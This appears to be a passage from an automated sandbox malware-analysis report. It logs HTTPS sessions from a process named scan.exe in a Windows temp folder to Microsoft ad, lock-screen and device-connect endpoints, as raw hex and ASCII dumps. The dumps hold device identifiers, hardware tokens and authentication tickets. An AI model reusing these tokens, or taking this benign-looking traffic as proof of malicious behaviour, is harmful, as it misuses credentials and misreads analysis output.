                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:07:26 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:26 UTC175INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.74978020.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:26 UTC172OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160713Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=fa4bc4b84f4f4c9e8636d3433a31d127&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338389&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAV5h4VnNbMe0CMUprulq7TgTt1NOO2vJcOFIUe76yd9D/3F5PKOpOD6fSE/Bqh+IS1TR7vDmbPTirai+obtgNFkH9g0PtQlcg0yMH4YdAlBT1IdgkTGKB3PXPa2hWPjnDF7kHyT0dq55ZY7UXPGRZmJlHM1IcwocIyiHRvILVhhkseEoE1yENgZCemJyIAsBaDXZxmQhyoqVngXTME27n2cXxdzBAUG+i2Z/F+20GJAsd6lPCxiYbP/rLVYhBbbragNJD46PzFzHIVy4sScZi6DTd7y0XMx+h0vimSAZCVN1sMxIdgJSxlkVGZzk8x1ej9/fG3dcqCtS7WXObAi+sJMDZgAACIciqMpZvOR1sAEp1GevXTt1kTMxzO4VQDZMjI9Eua8BH8Dy5XfThiu4sYakBJOcvwAvJfPDaCDbjnLkJDo6gG/RRCZ+9607hbscsHm/DHnXN7zxUUMgYFO1n7q/jiU7jfBdCyD7ML/90yskVRZgerci40hvvuYFvJNz0OrW9yiy3yHwapMkSat2C0a3GCVticwP9KoPTPXX/rtSLM2e8OAH3Q0SN+ZowogZAbFI76Vj2a7qoOtS/Wy75u3l+BKi41M9SP55Q7mUl3MRfILEmTq9YGIlVwo/ERpG1Y1cJFqQ9+5TV5ex0f8s6huthhUGTjIVcQa70QZNrsqQcfyvNVQStTriNbq+MaZ3Kyhb72AnhS6RsFkciQXqs2BZ5Uhx9UcV9w8p6n6cYDydmgo1LEH6oXMl6OqDfULCA/ZlkuMt610eHnvUWyy6PKz/wXjTjY34k8ZLVKilyjfNkjr5/8QHRXzBlF16kHNagrtCJNPYP8eF9SZ0mAvr2ycpUaprjHjmmTUQYZlcAKvrQqT7Ali+HbpDmH49yrNiMzahDXCsjWmlsAlH7uHDFa3Gn2EhHSoegK//0Hw4GrvZAQ==&p=
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2nJdRnC0TEiwNFBi.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:07:26 UTC178INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 3049
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"RADIDS":"1,P425116219-T700333446-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: ELP2EDqQF6rTWpS9Nf/FvzvDpiXsQF8i9FsGEQ0YSxPC+kHPT86wpkp16LuiQanGAR6SpOsnOF4kBT4c63AWteteLImJT2ac4MypIBGnilH1usF3VupvVFCkScv5i+6CIFPBtriLLZyEfLU6Ciad56ln1VKbOCrk1bP8wvK8iBNVEmDLUVxIZKY0Uqy8HuDFQ9ae+6khzdnwqr25wDPWUq3C1TYaVuw8GrNha3e5blSi0qpzyYW7bzImZtHz5e/YefVjbFSWb5NA5r5qXU82BZo0U6rALWT+bbz32kgY7Am0ImI7wk0rPWE0hHsXZkn1bGb0UmTd2PgepCjBWjRoJg==
                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:07:26 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:26 UTC179INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.74978120.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:27 UTC182OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160727Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ec9aec0afaf3446bbdd5156e92b72644&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338387&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&rver=2&sc-mode=0&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2nJdRnC0TEiwNFBi.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:07:27 UTC184INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 24734
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"RADIDS":"3,P425056668-T700379701-C128000000002535069+B+P90+S1,P425640427-T700390040-C128000000003440609+B+P55+S2,P425119424-T700340276-C128000000003023569+B+P20+S3"},{"BATCH_REDIRECT_STORE":"BWW_128000000002535069_EN-US+P0+S0"},{"BATCH_REDIRECT_STORE":"BWW_128000000003440609_EN-US+P0+S0"},{"BATCH_REDIRECT_STORE":"BWW_128000000003023569_EN-US+P0+S0"},{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: FY0rSxUZ2NzZA7DzCiqq9EbaqAJy/IWmLTxJZvObOloJrlGuOg6vl8MC5i1QkrXdffyRiMJoLRqR7/fm8fFAEtDumLDdJigubt6g0Y5BbIll1K6E7w5R7QVfy5InxEhco+Bm2RJoPaVio7iCFev6uLinKaJXZjvb+YNwib6nQpXgRrhaF1ac+hHAueR0+3X2YMKJ5rCUQANvYg9RW7H24dNTUwCNTDlA+MdhrOoz7Caf7c3uDQbRU75QhR/ZIDrE35LdEYBLATvGwOLAcpqW4PVU33uwnNFAIJpPIlAg6+c0n4ym10+q3oVfgoMCsMicFZNZwan8FLC6tQvBlPSoag==
                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:07:26 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:27 UTC185INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
                                                                                                          2022-08-13 07:07:27 UTC200INData Raw: 30 49 52 53 26 54 50 49 44 3d 34 32 35 36 34 30 34 32 37 26 52 45 51 41 53 49 44 3d 45 43 39 41 45 43 30 41 46 41 46 33 34 34 36 42 42 44 44 35 31 35 36 45 39 32 42 37 32 36 34 34 26 41 53 49 44 3d 7b 41 53 49 44 7d 26 54 49 4d 45 3d 7b 44 41 54 45 54 49 4d 45 7d 26 53 4c 4f 54 3d 32 26 52 45 51 54 3d 32 30 32 32 30 38 31 33 54 30 37 30 37 32 37 26 4d 41 5f 53 63 6f 72 65 3d 32 26 50 45 52 53 49 44 3d 38 38 33 30 35 38 30 37 41 32 37 36 38 44 45 32 36 46 37 33 41 45 43 43 36 38 39 32 32 33 34 32 26 47 4c 4f 42 41 4c 44 45 56 49 43 45 49 44 3d 36 38 32 35 37 39 35 30 35 32 37 39 35 32 33 39 26 4c 4f 43 41 4c 49 44 3d 77 3a 45 45 34 38 39 30 43 35 2d 39 30 41 45 2d 35 39 45 32 2d 35 41 43 35 2d 43 32 30 41 41 36 36 35 34 35 39 32 26 44 53 5f 45 56 54 49 44
                                                                                                          Data Ascii: 0IRS&TPID=425640427&REQASID=EC9AEC0AFAF3446BBDD5156E92B72644&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220813T070727&MA_Score=2&PERSID=88305807A2768DE26F73AECC68922342&GLOBALDEVICEID=6825795052795239&LOCALID=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&DS_EVTID


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          17192.168.2.74978220.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:28 UTC210OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160727Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=765f97b95e1c458290318a5835743286&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-338388&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2nJdRnC0TEiwNFBi.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:07:28 UTC213INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 4490
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"RADIDS":"1,P400091688-T700129702-C128000000000402926+B+P20+S1"},{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: jkgG4gSapoX5P/gaZBYn5ZcKAnxZqENslIIG1meSJFhDTO+r0j4RSL3k9h4fyCagKpU9FHA8tw8MFjy2YA9s6OMIXs6XrCOau53iRAEyytm6qkfpin8vgpjBLLs9x3+gXRjvOs0ciXX0ocukMpWYdy5gYUXPv1FgOKt5mIt+R1uEosMNXqZb0wasU+NFA2D+H+UF3csglknOWH2B/Pa4qd1MDkAmtooHETK/wrkv18326e0QOSXMLjJ9YcxFS+F9kD3NRWUtaH/J1CTiS86sTdZl6DaeaRvnEELRD5DVGLZxqROzXXKlTIMWeoMqCxLTMnu6cz56Ym0ziPWB13bt7Q==
                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:07:28 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:28 UTC214INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 74 65 6d 70 6c 61 74 65 54 79 70 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 74 65 78 74 5c 22 7d 2c 5c 22 6f 6e 52 65 6e 64 65 72 5c 22 3a 7b 5c 22 74
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"templateType\":{\"type\":\"text\"},\"onRender\":{\"t


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          18192.168.2.74978320.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:28 UTC212OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 66 35 62 39 38 33 38 39 66 39 34 30 32 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 49af5b98389f9402
                                                                                                          2022-08-13 07:07:28 UTC212OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:28 UTC212OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 66 35 62 39 38 33 38 39 66 39 34 30 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 49af5b98389f9402<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:28 UTC213OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 66 35 62 39 38 33 38 39 66 39 34 30 32 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: 49af5b98389f9402
                                                                                                          2022-08-13 07:07:28 UTC218INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:28 UTC218INData Raw: 4d 53 2d 43 56 3a 20 45 77 51 50 52 52 35 31 71 6b 36 57 47 31 31 54 49 4d 54 2b 54 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: EwQPRR51qk6WG11TIMT+TA.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          19192.168.2.74978420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
